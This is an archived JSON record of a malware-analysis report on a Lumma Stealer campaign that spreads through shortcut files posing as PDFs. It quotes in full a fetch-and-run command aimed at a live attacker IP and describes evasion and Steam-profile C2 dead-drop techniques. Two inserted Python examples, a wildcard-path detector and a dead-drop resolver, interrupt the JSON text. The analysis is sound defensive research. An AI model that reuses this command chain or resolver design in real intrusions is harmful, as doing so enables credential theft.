{
	"id": "c55bdb0b-85f8-48dc-86fe-02150f8ea368",
	"created_at": "2026-04-06T03:35:55.909225Z",
	"updated_at": "2026-04-10T03:21:25.527964Z",
	"deleted_at": null,
	"sha1_hash": "fb101f5144fa5c7fb5eb4f627aacb92b07804175",
	"title": "Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions' Infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1922403,
	"plain_text": "Lumma Stealer Chronicles: PDF-themed Campaign Using\r\nCompromised Educational Institutions' Infrastructure\r\nBy Mayank Sahariya\r\nPublished: 2025-08-21 · Archived: 2026-04-06 03:11:57 UTC\r\nExecutive Summary\r\nLumma Stealer is an information stealer sold through a Malware-as-a-Service (MaaS) platform. It is designed to steal sensitive data, including passwords, browser data, and cryptocurrency wallet details.\r\nThis report details an ongoing campaign distributing Lumma Stealer. The campaign's primary infection vector is a malicious LNK (shortcut) file crafted to look like a PDF document. When executed, the LNK file starts a multi-stage infection chain that ends with Lumma Stealer running on the victim's machine. Every stage depends on the user launching that one file, so user awareness, together with controls that alert on the script hosts the chain abuses (wmic.exe, mshta.exe and PowerShell), are the key defences. \r\n
The campaign targets multiple industries, including Education \u0026 Academia, Corporate \u0026 Business, Government \u0026 Legal, Healthcare \u0026 Pharmaceuticals, Financial \u0026 Banking, Engineering \u0026 Manufacturing, Technology \u0026 Blockchain, and Media \u0026 Journalism.\r\nWe previously published two in-depth reports on Lumma Stealer campaigns, detailing the tactics, techniques, and procedures (TTPs) the threat actors use to distribute and deploy the malware:\r\nHow Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels\r\nUnmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages\r\nFigure: mind map of the campaign\r\nhttps://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure\r\nPage 1 of 8\n\nAttribution and Analysis\r\nIn a drive-by compromise, a user visiting certain websites is redirected to a WebDAV server, and the connection is established without the user noticing. The redirection can open an explorer.exe window that lists the contents of the WebDAV share, which is where the malicious files are hosted.\r\nIn the analyzed infrastructure the files sat in an open directory on a WebDAV server at 87[.]120[.]115[.]240, for example “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”. A user who clicks to download what looks like a school fee structure instead receives a \"pdf.lnk\" file. Explorer never displays the .lnk extension and the shortcut carries a PDF icon, so the file appears to be a PDF.\r\nFigure: Users click on the PDF to download\r\nThe directory consisted mainly of “.lnk” files, weaponized to download further payloads through “mshta.exe”, a legitimate Microsoft binary that runs Microsoft HTML Application (HTA) files.\r\nLNK (shortcut) files are a common entry point in phishing campaigns. 
Disguised as documents or executables, they exploit the features of the shortcut format to deceive users and slip past security controls, which makes them an effective tool for gaining an initial foothold.\r\nThe LNK target does not invoke PowerShell directly. It runs wmic.exe, which spawns PowerShell, which in turn resolves a wildcard path to mshta.exe and points it at a remote URL: “C:\\Windows\\System32\\Wbem\\wmic.exe process call create \"powershell iex '\\*i*\\S*3*\\m*ta.e* https://80.76.51.231/Samarik' | powershell -\"”. The path \\*i*\\S*3*\\m*ta.e* never names the binary: PowerShell expands the wildcards against the current drive, where the only match is \\Windows\\System32\\mshta.exe. The trailing “| powershell -” feeds whatever the first command writes to standard output into a second PowerShell instance that reads its script from stdin. Keeping the string mshta.exe out of the shortcut defeats naive string matching on the LNK target, and because wmic.exe creates the process through the WMI provider host, PowerShell does not appear as a child of the shortcut's parent, breaking the process tree defenders usually look for.\r\nFigure: PowerShell command in the LNK file\r\nmshta.exe fetches and runs the content served from the Samarik URL. We extracted the script by dumping the file's overlay section, which revealed obfuscated JavaScript. \r\nFigure: Obfuscated JavaScript in the overlay section of Samarik\r\nThe script decodes a string into the variable aeQ and passes it to eval, a common technique in obfuscated or malicious scripts: the readable code exists only at run time.\r\nFigure: mshta.exe executing the JavaScript\r\nThe evaluated JavaScript contains a PowerShell script. That script embeds an AES-encrypted payload together with the routine that decrypts it in CBC mode using a hardcoded key, and hides its own logic behind simple arithmetic obfuscation. 
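Added example (not code from the CloudSEK report): a Python triage helper that pulls wildcarded path tokens out of a process command line and expands them the way PowerShell would, so an analyst or a detection rule can see that \\*i*\\S*3*\\m*ta.e* is mshta.exe rather than an ordinary glob. The miniature file tree, the two benign command lines and the list of script hosts are constructed for this example; only the wmic.exe line is taken from the report.

```python
import fnmatch
import re
from typing import Iterable, List, Tuple

# Constructed miniature of a Windows file tree: a stand-in for a real host
# scan so the example runs offline.
SAMPLE_TREE = [
    'C:\\Windows\\System32\\mshta.exe',
    'C:\\Windows\\System32\\msiexec.exe',
    'C:\\Windows\\System32\\cmd.exe',
    'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    'C:\\Windows\\SysWOW64\\mshta.exe',
    'C:\\Users\\Public\\Documents\\notes.txt',
]

# The first entry is the LNK target quoted in the report; the other two are
# constructed benign command lines for contrast.
SAMPLE_CMDLINES = [
    'C:\\Windows\\System32\\Wbem\\wmic.exe process call create \"powershell iex '
    '\u0027\\*i*\\S*3*\\m*ta.e* https://80.76.51.231/Samarik\u0027 | powershell -\"',
    'C:\\Windows\\System32\\cmd.exe /c dir C:\\Users\\Public',
    'powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\*\\Downloads',
]

# Script hosts that a wildcard path should never be allowed to expand to
# (an assumption of this example, not an indicator from the report).
SCRIPT_HOSTS = {'mshta.exe', 'wscript.exe', 'cscript.exe', 'powershell.exe',
                'rundll32.exe', 'regsvr32.exe'}

# A backslash-separated path token: optional drive letter, then one or more
# segments; a segment ends at whitespace, a double quote or a pipe.
PATH_TOKEN = re.compile('(?:[A-Za-z]:)?(?:\\\\[^\\\\ \"|]+)+')


def find_wildcard_paths(cmdline: str) -> List[str]:
    # Keep only the path tokens that contain a shell wildcard; legitimate
    # process launches almost never carry one in the image path.
    return [tok for tok in PATH_TOKEN.findall(cmdline) if '*' in tok or '?' in tok]


def resolve_wildcard_path(pattern: str, tree: Iterable[str]) -> List[str]:
    # Expand the pattern the way PowerShell does: one wildcard segment per
    # path component, compared case-insensitively. A pattern without a drive
    # letter is taken relative to the root of the current drive.
    pat_parts = [p for p in pattern.split('\\') if p]
    if not pat_parts:
        return []
    has_drive = len(pat_parts[0]) == 2 and pat_parts[0].endswith(':')
    hits = []
    for path in tree:
        parts = [p for p in path.split('\\') if p]
        cand = parts if has_drive else parts[1:]  # strip the drive for rootless patterns
        if len(cand) == len(pat_parts) and all(
            fnmatch.fnmatchcase(c.lower(), q.lower()) for c, q in zip(cand, pat_parts)
        ):
            hits.append(path)
    return hits


def triage(cmdline: str, tree: Iterable[str]) -> List[Tuple[str, List[str]]]:
    # For every wildcarded path in the command line, report what it expands to.
    return [(pat, resolve_wildcard_path(pat, tree)) for pat in find_wildcard_paths(cmdline)]


def is_suspicious(cmdline: str, tree: Iterable[str]) -> bool:
    # Fire only when a wildcard path resolves to a script host: that is the
    # \\*i*\\S*3*\\m*ta.e* trick, not an ordinary Get-ChildItem glob.
    for _pat, hits in triage(cmdline, tree):
        for hit in hits:
            if hit.rsplit('\\', 1)[-1].lower() in SCRIPT_HOSTS:
                return True
    return False


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(is_suspicious(line, SAMPLE_TREE), triage(line, SAMPLE_TREE))
```

The rule keys on what the path resolves to rather than on the presence of a wildcard, because administrators do pass globs to Get-ChildItem and similar cmdlets; the third sample line carries one and is not flagged. Against a real endpoint the tree must come from the host itself or from a known-good listing of System32 and SysWOW64, since the attacker's pattern is tuned to the layout of a stock Windows install.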
\r\nFigure: Encrypted PowerShell script\r\nAfter the script's variables and functions are renamed to readable names, the download-and-execute logic is plain.\r\nFigure: Decrypted and normalized PowerShell script\r\nThe final PowerShell script downloads the file from https[:]//80.76.51[.]231/Kompass-4.1.2.exe, extracts its contents, and executes “Kompass-4.1.2.exe”, which is Lumma Stealer.\r\nOnce it has infected a system, Lumma Stealer contacts its command and control (C2) servers to exfiltrate the stolen data. The sample tries several C2 domains in turn; at the time of analysis none of them was reachable.\r\nFigure: Malware communicating with its C2 domains and steamcommunity.com\r\nIf none of its embedded C2 domains responds, the sample falls back to a Steam community profile. The Steam URL is handled differently from the C2 domains: it is stored in the executable code and decrypted with a separate routine.\r\nhxxps://steamcommunity.com/profiles/76561199724331900\r\nThe number 76561199724331900 has the format of a Steam64 ID, the 17-digit identifier Steam assigns to each account, so the URL is the public profile page of an account rather than a game or matchmaking endpoint. The profile was created on June 28, 2024.\r\nUsing a Steam profile as a dead-drop resolver is an effective evasion technique: the C2 lookup blends into traffic to a trusted, widely used platform and keeps working after the hardcoded domains are taken down.\r\nFigure: Steam profile account “76561199724331900”\r\nThe threat actor most likely created this Steam account solely so that its profile page could serve as the dead drop. 
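Added example (not code from the report or from the malware): a Python implementation of the Steam-profile dead-drop resolver described above. It validates the Steam64 ID the profile URL is built from, parses the actual_persona_name element out of the profile HTML, and brute-forces the Caesar shift to recover the C2 domain. The profile HTML, the persona name, the recovered domain and the short TLD list used to rank candidates are all constructed for this example; the report does not state the shift the sample uses, so every shift is tried.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed stand-in for the HTML of a Steam profile page. Only the
# persona-name element matters; the persona name is a made-up Caesar-shifted
# domain, not an indicator from the report.
SAMPLE_PROFILE_HTML = '''
<html><body>
<div class=\"profile_header_summary\">
  <span class=\"actual_persona_name\">his7-xdsh.ytu</span>
  <div class=\"profile_summary\">Just here for the games.</div>
</div>
</body></html>
'''

STEAM64_BASE = 76561197960265728  # Steam64 ID of account number 0 (public universe, individual)
STEAM64_SHAPE = re.compile('^7656119[0-9]{10}$')

# Short TLD list used to rank brute-forced shifts; an assumption of this example.
LIKELY_TLDS = {'com', 'net', 'org', 'xyz', 'top', 'shop', 'site', 'io', 'ru', 'cc', 'info', 'biz'}
DOMAIN_SHAPE = re.compile('^[a-z0-9-]+(\\.[a-z0-9-]+)+$')


def steam64_to_account_id(steam64: str) -> int:
    # Reject anything that is not a 17-digit Steam64 ID, then strip the base
    # to get the 32-bit account number Steam uses internally.
    if not STEAM64_SHAPE.match(steam64):
        raise ValueError('not a Steam64 ID: ' + steam64)
    return int(steam64) - STEAM64_BASE


class PersonaNameParser(HTMLParser):
    # Collects the text of every element whose class list contains
    # actual_persona_name, the element the sample reads from the page.
    def __init__(self) -> None:
        super().__init__()
        self.names: List[str] = []
        self._depth = 0            # > 0 while inside a persona-name element
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        classes = (dict(attrs).get('class') or '').split()
        if self._depth:
            self._depth += 1
        elif 'actual_persona_name' in classes:
            self._depth = 1
            self._buf = []

    def handle_endtag(self, tag):
        if self._depth:
            self._depth -= 1
            if self._depth == 0:
                self.names.append(''.join(self._buf).strip())

    def handle_data(self, data):
        if self._depth:
            self._buf.append(data)


def extract_persona_names(html: str) -> List[str]:
    parser = PersonaNameParser()
    parser.feed(html)
    parser.close()
    return parser.names


def caesar(text: str, shift: int) -> str:
    # Rotate ASCII letters by shift positions; digits, dots and hyphens pass
    # through, which is why a shifted domain still looks like a domain.
    out = []
    for ch in text:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif 'A' <= ch <= 'Z':
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return ''.join(out)


def recover_c2_domains(persona: str) -> List[Tuple[int, str]]:
    # The report does not give the shift, so try all 25 and keep the decodings
    # that look like a registrable domain with a plausible TLD.
    found = []
    for shift in range(1, 26):
        candidate = caesar(persona, -shift).lower()
        if DOMAIN_SHAPE.match(candidate) and candidate.rsplit('.', 1)[1] in LIKELY_TLDS:
            found.append((shift, candidate))
    return found


def resolve_dead_drop(steam64: str, html: str) -> List[Tuple[int, str]]:
    # Full chain: validate the profile ID (the malware builds
    # https://steamcommunity.com/profiles/<id> from it), parse the persona
    # name out of the fetched page, and decode it into C2 candidates.
    steam64_to_account_id(steam64)  # raises on a malformed ID
    results: List[Tuple[int, str]] = []
    for name in extract_persona_names(html):
        results.extend(recover_c2_domains(name))
    return results


if __name__ == '__main__':
    for shift, domain in resolve_dead_drop('76561199724331900', SAMPLE_PROFILE_HTML):
        print(f'shift {shift}: {domain}')
```

In a live investigation the shift comes from the sample's own decryption routine and the HTML from a fetch of the profile URL through a sandboxed proxy, not from a TLD heuristic; the brute force here only shows why the scheme is cheap for the operator, since changing the persona name re-points every infected host without touching the binary. Blocking steamcommunity.com is rarely an option, so the detectable signal is a non-browser process, launched from the LNK chain, requesting a /profiles/ page.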
The sample first fetches the profile page, reads the text of the element carrying the \"actual_persona_name\" class, and decodes that string with a Caesar cipher to recover the C2 domain. Because the persona name can be changed at any time from the Steam account, the operator can point infected hosts at new infrastructure without redeploying the malware.\r\nFigure: HTML class on the Steam profile page\r\nThe LNK file names seen in the campaign mimic legitimate PDF documents (contracts, financial reports, academic materials, technical brochures and similar). Judging by these lures, Lumma Stealer targets industries including but not limited to Education \u0026 Academia, Corporate \u0026 Business, Government \u0026 Legal, Healthcare \u0026 Pharmaceuticals, Financial \u0026 Banking, Engineering \u0026 Manufacturing, Technology \u0026 Blockchain, and Media \u0026 Journalism.\r\nFigure: File names mimicking legitimate PDF documents\r\nSource: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure"
	],
	"report_names": [
		"lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure"
	],
	"threat_actors": [],
	"ts_created_at": 1775446555,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.pdf",
		"text": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.txt",
		"img": "https://archive.orkl.eu/fb101f5144fa5c7fb5eb4f627aacb92b07804175.jpg"
	}
}